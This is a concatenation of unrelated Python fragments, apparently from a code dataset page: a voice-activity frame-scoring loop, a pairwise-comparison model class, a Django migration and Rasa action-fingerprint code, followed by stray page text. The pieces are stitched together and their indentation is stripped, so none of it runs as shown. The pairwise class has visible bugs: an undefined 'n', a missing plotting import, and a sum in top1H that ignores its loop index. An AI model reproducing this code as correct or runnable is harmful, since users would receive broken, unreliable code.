prev_state = None
for i in range(0, this_len):
ref = this_ref[i]
pred = this_pred[i]
if ref == "0" and pred == "0":
frame_diff.sil_as_sil += 1
this_frame_diff.sil_as_sil += 1
state = 0
elif ref == "0" and pred == "1":
frame_diff.sil_as_noise += 1
this_frame_diff.sil_as_noise += 1
state = 1
elif ref == "0" and pred == "2":
frame_diff.sil_as_speech += 1
this_frame_diff.sil_as_speech += 1
state = 2
elif ref == "1" and pred == "0":
frame_diff.noise_as_sil += 1
this_frame_diff.noise_as_sil += 1
state = 3
elif ref == "1" and pred == "1":
frame_diff.noise_as_noise += 1
this_frame_diff.noise_as_noise += 1
state = 4
elif ref == "1" and pred == "2":
frame_diff.noise_as_speech += 1
this_frame_diff.noise_as_speech += 1
state = 5
elif ref == "2" and pred == "0":
frame_diff.speech_as_sil += 1
this_frame_diff.speech_as_sil += 1
state = 6
elif ref == "2" and pred == "1":
frame_diff.speech_as_noise += 1
this_frame_diff.speech_as_noise += 1
state = 7
elif ref == "2" and pred == "2":
frame_diff.speech_as_speech += 1
this_frame_diff.speech_as_speech += 1
state = 8
if prev_state != state:
if count > 0:
this_frame_diff.state_count[prev_state].append(count)
frame_diff.state_count[prev_state].append(count)
this_frame_diff.markers[prev_state].append(i-count)
count = 1
prev_state = state
else:
count += 1
sys.stdout.write("\n"+file_id+"\n")
this_frame_diff.compute_stats()
this_frame_diff.write()
sys.stdout.write("\nTOTAL\n")
frame_diff.compute_stats()
frame_diff.write()
if __name__ == '__main__':
main()
|
from numpy import *
'''
Model for pairwise comparisons
'''
class pairwise:
def __init__(self,n):
self.ctr = 0 # counts how many comparisons have been queried
self.n = n
def random_uniform(self):
'''
generate random pairwise comparison mtx with entries uniform in [0,1]
'''
self.P = random.rand(self.n,self.n)*0.9
for i in range(n):
self.P[i,i] = 0.5
for i in range(n):
for j in range(i+1,n):
self.P[i,j] = 1 - self.P[j,i]
self.sortP()
def sortP(self):
# sort the matrix according to scores
scores = self.scores()
pi = argsort(-scores)
self.P = self.P[:,pi]
self.P = self.P[pi,:]
def generate_BTL(self,sdev=1):
self.P = zeros((self.n,self.n))
# Gaussian seems reasonable;
# if we choose it more extreme, e.g., like Gaussian^2 it looks
# very different than the real-world distributions
w = sdev*random.randn(self.n)
self.w = w
# w = w - min(w) does not matter
for i in range(self.n):
for j in range(i,self.n):
self.P[i,j] = 1/( 1 + exp( w[j] - w[i] ) )
self.P[j,i] = 1 - self.P[i,j]
self.sortP()
def uniform_perturb(self,sdev=0.01):
for i in range(self.n):
for j in range(i,self.n):
perturbed_entry = self.P[i,j] + sdev*(random.rand()-0.5)
if perturbed_entry > 0 and perturbed_entry < 1:
self.P[i,j] = perturbed_entry
self.P[j,i] = 1-perturbed_entry
def generate_deterministic_BTL(self,w):
self.w = w
self.P = zeros((self.n,self.n))
for i in range(self.n):
for j in range(i,self.n):
self.P[i,j] = 1/( 1 + exp( w[j] - w[i] ) )
self.P[j,i] = 1 - self.P[i,j]
self.sortP()
def generate_const(self,pmin = 0.25):
self.P = zeros((self.n,self.n))
for i in range(self.n):
for j in range(i+1,self.n):
self.P[i,j] = 1 - pmin
self.P[j,i] = pmin
def compare(self,i,j):
self.ctr += 1
if random.rand() < self.P[i,j]:
return 1 # i beats j
else:
return 0 # j beats i
def scores(self):
P = array(self.P)
for i in range(len(P)):
P[i,i] = 0
return sum(P,axis=1)/(self.n-1)
def plot_scores(self):
plt.plot(range(self.n), self.scores(), 'ro')
plt.show()
def top1H(self):
sc = self.scores();
return 1/(sc[0]-sc[1])**2 + sum([ 1/(sc[0]-sc[1])**2 for i in range(1,self.n)])
def top1parH(self):
sc = self.scores();
w = sorted(self.w,reverse=True)
return (( exp(w[0])-exp(w[1]) )/( exp(w[0])+exp(w[1]) ))**-2 + sum([ (( exp(w[0])-exp(w[i]) )/( exp(w[0])+exp(w[i]) ))**-2 for i in range(1,self.n)])
|
# Generated by Django 3.2 on 2021-06-13 10:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('loginAPI', '0012_book_brand_one'),
]
operations = [
migrations.AddField(
model_name='book',
name='manyfield',
field=models.ManyToManyField(related_name='many', to='loginAPI.Users'),
),
]
|
import dataclasses
from typing import DefaultDict, Dict, List, Optional, Set, Text, TYPE_CHECKING
from collections import defaultdict
from rasa.shared.core.events import ActionExecuted, UserUttered
from rasa.shared.core.events import SlotSet, ActiveLoop
if TYPE_CHECKING:
from rasa.shared.core.domain import Domain
from rasa.shared.core.trackers import DialogueStateTracker
from rasa.shared.core.events import Event
@dataclasses.dataclass
class ActionFingerprint:
"""Dataclass to represent an action fingerprint."""
slots: List[Text]
active_loop: List[Optional[Text]]
def _find_events_after_actions(
trackers: List["DialogueStateTracker"],
) -> DefaultDict[Text, Set["Event"]]:
"""Creates a mapping of action names / texts and events that follow these actions.
Args:
trackers: the list of trackers
Returns:
A mapping of action names / texts and events that follow these actions.
"""
events_after_actions = defaultdict(set)
for tracker in trackers:
action_name = None
for event in tracker.events:
if isinstance(event, ActionExecuted):
action_name = event.action_name or event.action_text
continue
if isinstance(event, UserUttered):
# UserUttered can contain entities that might set some slots, reset
# action_name so that these slots are not attributed to action_listen
action_name = None
continue
if action_name:
events_after_actions[action_name].add(event)
return events_after_actions
def create_action_fingerprints(
trackers: List["DialogueStateTracker"], domain: "Domain"
) -> Dict[Text, ActionFingerprint]:
"""Fingerprint each action using the events it created during train.
This allows us to emit warnings when the model is used
if an action does things it hasn't done during training,
or if rules are incomplete.
Args:
trackers: the list of trackers
domain: the domain
Returns:
a nested dictionary of action names and slots and active loops
that this action sets
"""
events_after_actions = _find_events_after_actions(trackers)
if not events_after_actions:
return {}
# take into account only featurized slots
featurized_slots = {slot.name for slot in domain.slots if slot.has_features()}
action_fingerprints: Dict[Text, ActionFingerprint] = {}
for action_name, events_after_action in events_after_actions.items():
slots = list(
set(
event.key for event in events_after_action if isinstance(event, SlotSet)
).intersection(featurized_slots)
)
active_loops = list(
set(
event.name
for event in events_after_action
if isinstance(event, ActiveLoop)
)
)
action_fingerprints[action_name] = ActionFingerprint(slots, active_loops)
return action_fingerprints
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.